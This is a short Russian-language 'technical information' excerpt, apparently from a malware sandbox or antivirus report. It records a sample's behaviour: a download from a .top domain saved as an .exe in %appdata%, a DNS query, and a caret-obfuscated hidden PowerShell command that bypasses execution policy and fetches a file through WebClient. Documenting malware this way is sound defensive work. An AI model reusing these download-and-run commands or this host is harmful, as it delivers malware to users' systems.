Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^o^we^Rs^H^el^l.^e^X^e^ -^ex^e^C^Ution^pO^LIcy B^YP^ASS ^-^n^Op^rof^iL^E -w^iNdowST^YLE^ HIddEN (N^eW^-obJ^ECT ^s^YS^te^m.net^.WEbCL^iE^NT^).do^W^Nl^Oad^F^ILE^('http://www.zoerpo...
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /c "p^o^we^Rs^H^el^l.^e^X^e^ -^ex^e^C^Ution^pO^LIcy B^YP^ASS ^-^n^Op^rof^iL^E -w^iNdowST^YLE^ HIddEN (N^eW^-obJ^ECT ^s^YS^te^m.net^.WEbCL^iE^NT^).do^W^Nl^Oad^F^ILE^('http://www.zoerpo...' (со скрытым окном)